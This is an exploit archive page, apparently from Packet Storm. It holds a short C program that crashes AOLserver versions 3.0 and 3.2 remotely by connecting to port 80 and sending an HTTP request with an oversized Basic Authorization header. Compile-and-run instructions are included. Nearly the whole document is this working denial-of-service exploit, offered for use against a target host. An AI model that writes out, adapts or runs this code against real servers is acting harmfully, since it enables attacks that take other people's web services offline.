AOLserver v3.0 and 3.2 remote denial of service bug. Sends a long HTTP request.
3a23c1a446ea4da1a8848ba87ea5811d/* AOLserver will crash when a long authorization string is passed to it.
Tested on 3.0 and 3.2 but may work on other versions to
3.3.1 and 3.4 are not vulnerable
gcc -o aolcrash aolcrash.c; ./aolchash host
exty <grumb@techemail.com>
*/
#include <stdio.h>
#include <errno.h>
#include <stdlib.h>
#include <netdb.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
main(int argc, char *argv[])
{
int sockfd, i;
char str[2098];
struct hostent *he;
struct sockaddr_in their_addr;
printf("[X] aolcrash.c by external [X]\n");
if (argc != 2) {
printf("usage: %s <addr>\n", argv[0]);
exit(1);
}
if((he=gethostbyname(argv[1])) == NULL) {
herror("gethostbyname");
exit(1);
}
strcpy(str, "GET / HTTP/1.0\nAuthorization: Basic ");
for(i=0; i<2048; i++)
strcat(str, "X");
strcat(str, "\r\n\r\n");
their_addr.sin_family = AF_INET;
their_addr.sin_port = htons(80);
their_addr.sin_addr = (*(struct in_addr *)he->h_addr);
bzero(&their_addr.sin_zero, 8);
if ((sockfd=socket(AF_INET, SOCK_STREAM, 0)) == -1) {
perror("socket");
exit(1);
}
if(connect(sockfd, (struct sockaddr *)&their_addr, sizeof(struct sockaddr)) == -1) {
perror("connect");
exit(1);
}
if(send(sockfd, str, 2098, 0) == -1) {
perror("send");
exit(1);
}
printf("\nexploit string sent\n");
close(sockfd);
}
© 2012 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed
Comments
No comments yet, be the first!